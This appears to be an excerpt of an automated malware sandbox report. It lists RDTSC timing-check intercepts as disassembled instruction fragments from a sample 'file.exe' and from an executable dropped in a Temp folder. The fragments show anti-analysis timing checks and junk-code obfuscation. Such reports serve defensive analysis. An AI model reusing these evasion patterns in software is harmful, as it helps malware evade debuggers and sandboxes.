Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF004D second address: 4FF0077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D44D0519Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f mov ax, 97DDh 0x00000013 mov dx, cx 0x00000016 popad 0x00000017 xchg eax, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4D44D0519Bh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0120 second address: 4FF0126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0952 second address: 4FF0964 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4D44D0519Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0964 second address: 4FF0982 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4D45034D23h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0982 second address: 4FF09B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F4D44D0519Eh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF09B7 second address: 4FF09BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF09BC second address: 4FF09C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF09C2 second address: 4FF09C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF09C6 second address: 4FF09CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF09CA second address: 4FF09EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [75AF459Ch], 05h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4D45034D1Fh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF09EC second address: 4FF09F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF09F2 second address: 4FF09F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF09F8 second address: 4FF09FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0CAF second address: 4FF0CBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0CBE second address: 4FF0CF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4D44D051A8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0CF9 second address: 4FF0D08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0D08 second address: 4FF0D0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0D0E second address: 4FF0D39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F4DB5AC897Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4D45034D20h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0D39 second address: 4FF0D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0D3D second address: 4FF0D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000ABE second address: 5000AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000AC2 second address: 5000ADE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000ADE second address: 5000AE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000AE6 second address: 5000AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000AF4 second address: 5000AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000AF8 second address: 5000AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000AFE second address: 5000B17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000B17 second address: 5000B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000B1B second address: 5000B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000B1F second address: 5000B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000B25 second address: 5000B4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4D44D0519Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000B4A second address: 5000B59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000B59 second address: 5000B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000B5F second address: 5000B99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov eax, 5E1279F3h 0x0000000f mov ecx, 05D0C24Fh 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushfd 0x0000001a jmp 00007F4D45034D1Eh 0x0000001f and eax, 0D1406F8h 0x00000025 jmp 00007F4D45034D1Bh 0x0000002a popfd 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000B99 second address: 5000BED instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F4D44D051A5h 0x0000000d and ecx, 1ED0F396h 0x00000013 jmp 00007F4D44D051A1h 0x00000018 popfd 0x00000019 popad 0x0000001a mov esi, dword ptr [ebp+0Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 call 00007F4D44D051A6h 0x00000025 pop eax 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000BED second address: 5000BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000BF3 second address: 5000C13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4D44D0519Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000C13 second address: 5000C22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000C22 second address: 5000C60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4DB579290Eh 0x0000000f jmp 00007F4D44D0519Eh 0x00000014 cmp dword ptr [75AF459Ch], 05h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000C60 second address: 5000C66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000C66 second address: 5000CA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F4DB57AA9BFh 0x0000000e jmp 00007F4D44D0519Dh 0x00000013 xchg eax, esi 0x00000014 jmp 00007F4D44D0519Eh 0x00000019 push eax 0x0000001a jmp 00007F4D44D0519Bh 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000CA3 second address: 5000CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000CA7 second address: 5000CAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000CDA second address: 5000CF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4D45034D24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000CF2 second address: 5000D19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e mov ch, C1h 0x00000010 popad 0x00000011 mov dword ptr [esp], esi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4D44D0519Fh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000D19 second address: 5000D36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000D96 second address: 5000D9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000D9C second address: 5000DA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000DA0 second address: 5000DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a mov di, 8838h 0x0000000e pushfd 0x0000000f jmp 00007F4D44D051A1h 0x00000014 xor cx, 5826h 0x00000019 jmp 00007F4D44D051A1h 0x0000001e popfd 0x0000001f popad 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F4D44D0519Dh 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: E4EC28 second address: E4EC2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FAEE09 second address: FAEE0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FCAC08 second address: FCAC1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4D45034D1Ah 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FCAFE0 second address: FCAFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FCAFE4 second address: FCAFE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FCAFE8 second address: FCAFEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FCAFEE second address: FCAFFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F4D45034D1Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FCB1B4 second address: FCB1E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4D44D0519Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FCB1E0 second address: FCB1E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FCB1E4 second address: FCB1F4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4D44D05196h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FCEAB8 second address: FCEB1E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 763E01FBh 0x0000000f mov dx, 6D7Fh 0x00000013 push 00000003h 0x00000015 mov edx, dword ptr [ebp+122D2C93h] 0x0000001b jnl 00007F4D45034D19h 0x00000021 push 00000000h 0x00000023 mov ecx, 0E4798FBh 0x00000028 push 00000003h 0x0000002a mov dx, si 0x0000002d push E2270930h 0x00000032 je 00007F4D45034D20h 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b jp 00007F4D45034D16h 0x00000041 popad 0x00000042 xor dword ptr [esp], 22270930h 0x00000049 adc cx, F4C0h 0x0000004e lea ebx, dword ptr [ebp+12453931h] 0x00000054 xchg eax, ebx 0x00000055 je 00007F4D45034D39h 0x0000005b push eax 0x0000005c push edx 0x0000005d jnp 00007F4D45034D16h 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FCECE7 second address: FCED0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 js 00007F4D44D05196h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D3819h], edi 0x00000015 push 00000000h 0x00000017 mov ecx, 154CCD60h 0x0000001c push ACE6FB2Ch 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FED249 second address: FED250 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FED250 second address: FED26B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D44D051A5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FED6F2 second address: FED6F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FED892 second address: FED8A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FED8A0 second address: FED8B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4D45034D22h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEDB3C second address: FEDB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D44D051A7h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEDB57 second address: FEDB9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D20h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jmp 00007F4D45034D29h 0x00000012 js 00007F4D45034D22h 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEDCD8 second address: FEDCF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D44D0519Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F4D44D05196h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FE2443 second address: FE247B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D45034D1Eh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F4D45034D1Fh 0x00000012 jmp 00007F4D45034D21h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE321 second address: FEE326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE326 second address: FEE32F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE32F second address: FEE333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE333 second address: FEE354 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4D45034D22h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE354 second address: FEE35A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE35A second address: FEE360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE360 second address: FEE365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE365 second address: FEE371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F4D45034D16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE371 second address: FEE375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE375 second address: FEE379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE379 second address: FEE37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE891 second address: FEE8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F4D45034D1Ch 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE8A3 second address: FEE8C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4D44D051A4h 0x00000010 jg 00007F4D44D05196h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE8C8 second address: FEE8D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEEA70 second address: FEEA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4D44D05196h 0x0000000a jmp 00007F4D44D051A7h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEEA93 second address: FEEAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push edx 0x00000008 je 00007F4D45034D16h 0x0000000e jmp 00007F4D45034D21h 0x00000013 pop edx 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEEBFF second address: FEEC12 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jne 00007F4D44D05196h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
